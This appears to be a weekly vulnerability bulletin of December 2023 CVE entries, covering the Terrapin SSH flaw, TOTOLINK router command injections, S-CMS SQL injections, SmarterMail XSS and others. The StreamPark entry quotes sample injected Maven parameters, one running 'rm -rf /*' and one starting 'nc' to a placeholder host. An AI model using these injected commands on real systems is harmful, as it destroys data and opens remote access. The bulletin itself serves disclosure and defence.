openssh -- opensshThe SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.2023-12-18not yet calculatedCVE-2023-48795
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
pdf24_creator -- pdf24_creatorAn issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe.2023-12-19not yet calculatedCVE-2023-49147
cve@mitre.org
cve@mitre.org
cve@mitre.org
phpsysinfo -- phpsysinfoCross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file.2023-12-19not yet calculatedCVE-2023-49006
cve@mitre.org
cve@mitre.org
cve@mitre.org
proftpd -- proftpdmake_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics.2023-12-22not yet calculatedCVE-2023-51713
cve@mitre.org
cve@mitre.org
cve@mitre.org
qbit-matui -- qbit-matuiCross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file.2023-12-21not yet calculatedCVE-2023-50473
cve@mitre.org
cve@mitre.org
ruijie -- ws6008Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 was discovered to contain a command injection vulnerability via the function downFiles.2023-12-20not yet calculatedCVE-2023-50993
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51048
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_bbsauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51049
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51050
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51051
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_formauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51052
cve@mitre.org
smartertools -- smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name.2023-12-21not yet calculatedCVE-2023-48114
cve@mitre.org
cve@mitre.org
smartertools -- smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request.2023-12-21not yet calculatedCVE-2023-48115
cve@mitre.org
cve@mitre.org
smartertools -- smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment.2023-12-21not yet calculatedCVE-2023-48116
cve@mitre.org
cve@mitre.org
softing -- edgeaggregatorSofting edgeAggregator Restore Configuration Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root. Was ZDI-CAN-20543.2023-12-19not yet calculatedCVE-2023-38126
zdi-disclosures@trendmicro.com
stormshield_network_security -- stormshield_network_securityAn issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.39, 3.11.0 through 3.11.27, 4.3.0 through 4.3.22, 4.6.0 through 4.6.9, and 4.7.0 through 4.7.1. It's possible to know if a specific user account exists on the SNS firewall by using remote access commands.2023-12-21not yet calculatedCVE-2023-41166
cve@mitre.org
stormshield_network_security -- stormshield_network_securityAn issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine.2023-12-21not yet calculatedCVE-2023-47093
cve@mitre.org
streampark -- streamparkIn streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &2023-12-15not yet calculatedCVE-2023-49898
security@apache.org
sudo -- sudoSudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit.2023-12-22not yet calculatedCVE-2023-42465
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
thirty_bees -- thirty_beesA stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling.2023-12-22not yet calculatedCVE-2023-45957
cve@mitre.org
cve@mitre.org
cve@mitre.org
totolink -- a3700rThere is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi .cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513.2023-12-22not yet calculatedCVE-2023-50147
cve@mitre.org
totolink -- ex1200lTOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface.2023-12-22not yet calculatedCVE-2023-51033
cve@mitre.org
totolink -- ex1200lTOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface.2023-12-22not yet calculatedCVE-2023-51034
cve@mitre.org
totolink -- ex1200lTOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface.2023-12-22not yet calculatedCVE-2023-51035
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanPriDns parameter' of the setLanConfig interface of the cstecgi .cgi2023-12-22not yet calculatedCVE-2023-51011
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanGateway parameter' of the setLanConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51012
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanNetmask parameter' of the setLanConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51013
cve@mitre.org
totolink -- ex1800tTOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter' of the setLanConfig interface of the cstecgi .cgi2023-12-22not yet calculatedCVE-2023-51014
cve@mitre.org
totolink -- ex1800tTOTOLINX EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the 'enable parameter' of the setDmzCfg interface of the cstecgi .cgi2023-12-22not yet calculatedCVE-2023-51015
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51016
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanIp parameter' of the setLanConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51017
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'opmode' parameter of the setWiFiApConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51018
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'key5g' parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51019
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'langType' parameter of the setLanguageCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51020
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'merge' parameter of the setRptWizardCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51021
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'langFlag' parameter of the setLanguageCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51022
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the 'host_time' parameter of the NTPSyncWithHost interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51023
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'tz' parameter of the setNtpCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51024
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the 'admuser' parameter of the setPasswordCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51025
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'hour' parameter of the setRebootScheCfg interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51026
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'apcliAuthMode' parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi.2023-12-22not yet calculatedCVE-2023-51027
cve@mitre.org
totolink -- ex1800tTOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51028
cve@mitre.org
weintek -- cmt2078x_easywebAn authenticated command injection vulnerability in Weintek cMT2078X easyweb Web Version v2.1.3, OS v20220215 allows attackers to execute arbitrary code or access sensitive information via injecting a crafted payload into the HMI Name parameter.2023-12-19not yet calculatedCVE-2023-50466
cve@mitre.org
windows -- multiple_productsAn issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file.2023-12-19not yet calculatedCVE-2023-47267
cve@mitre.org
xpand_it -- write-back_managerXpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack.2023-12-20not yet calculatedCVE-2023-27172
cve@mitre.org

Back to top

Please share your thoughts

We recently updated our anonymous product survey; we’d welcome your feedback.